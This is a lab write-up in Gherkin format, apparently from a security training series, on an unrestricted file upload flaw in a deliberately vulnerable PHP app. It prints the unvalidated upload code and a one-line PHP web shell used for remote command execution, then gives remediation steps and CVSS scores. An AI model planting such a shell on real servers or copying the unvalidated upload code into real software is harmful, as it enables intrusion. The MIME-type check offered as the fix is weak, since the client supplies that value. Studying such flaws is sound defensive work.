## Version 1.4.1
## language: en

Feature: File Upload Level 1
  TOE:
    Vulnerable Web Application
  Category:
    File Upload
  Location:
    http://192.168.1.8/www/FileUpload/fileupload1.php
  CWE:
    CWE-434: Unrestricted Upload of File with Dangerous Type
  Rule:
    REQ.043: https://fluidattacks.com/web/rules/043/
  Goal:
    Upload a file
  Recommendation:
    Generate a unique and random name for files and store
    them in a non-standard place

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali linux      | 4.19.0      |
    | Firefox         | 60.6.2      |
    | Python          | 2.7.15+     |
  TOE information:
    Given The site "http://192.168.1.8/www/FileUpload/fileupload1.php"
    When I enter into the site
    Then The server is running LAMPP


  Scenario: Normal use case
    Given The site
    When I click on "Choose File"
    Then I select a local file
    And Upload it to the server

  Scenario: Static detection
    Given The source code
    When I see the block of code when the file is uploaded
    """
    if(isset($_POST["submit"])) {
      $target_dir = "uploads/";
      $target_file = $target_dir . basename($_FILES["file"]["name"]);
      move_uploaded_file($_FILES["file"]["tmp_name"], $target_file);
      echo "File uploaded /uploads/".$_FILES["file"]["name"];
    }
    """
    Then There is no validation of the file type
    And I have the path where the file is uploaded

  Scenario: Dynamic detection
    Given Th site
    When I click on "Choose File"
    Then I upload a file
    """
    File uploaded /uploads/index.jpeg
    """
    And I can navigate to the file [evidence](image1.png)

  Scenario: Exploitation
    Given The file upload vulnerability
    When I create a python script "upload.py"
    Then I upload a ".php" file with a code to execute commands
    """
    ?php system($_GET['cmd']); ?>
    """
    When I run the python script "upload.py"
    """
    python upload.py 192.168.1.8
    File uploaded
    $
    """
    Then I can read commands from the terminal
    When I send the commands to the url
    """
    http://192.168.1.8/www/FileUpload/uploads/shell.php?cmd=
    """
    Then I get the output in the script [evidence](image2.png)
    And I have remote command execution

  Scenario: Remediation
    Given The "uploads" folder
    When I create a .htaccess file in the folder
    """
    order deny,allow
    deny from all
    allow from 127.0.0.1
    """
    Then I only have access to the uploads folder from the ip "127.0.0.1"
    When I try to access the file after upload it
    Then I get a forbidden message
    """
    Access forbidden!
    You don't have permission to access the requested object.
    It is either read-protected or not readable by the server.
    If you think this is a server error, please contact the webmaster.
    """
    And I have to validate also the files
    When I change the source code to validate allowed files
    """
    $file_type = $_FILES['file']['type']; //get the mimetype

    $allowed_files = array("image/jpeg", "image/gif", "image/png");
    if(!in_array($file_type, $allowed_files)) {
      echo 'Only jpeg, gif, png files allowed';
      exit();
    }
    """
    Then The code only allow ".jpeg", ".gif" and ".png" files
    When I try to upload a ".php" file
    Then I get the forbidden message [evidence](image3.png)
    And The vulnerability is patched

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      9.8/10 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    Temporal: Attributes that measure the exploit's popularity and fixability
      9.5/10 (Critical) - E:H/RL:O/RC:C/CR:M/IR:M/AR:M
    Environmental: Unique and relevant attributes to a specific user environment
      9.5/10 (Critical) - MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date 2019-09-09
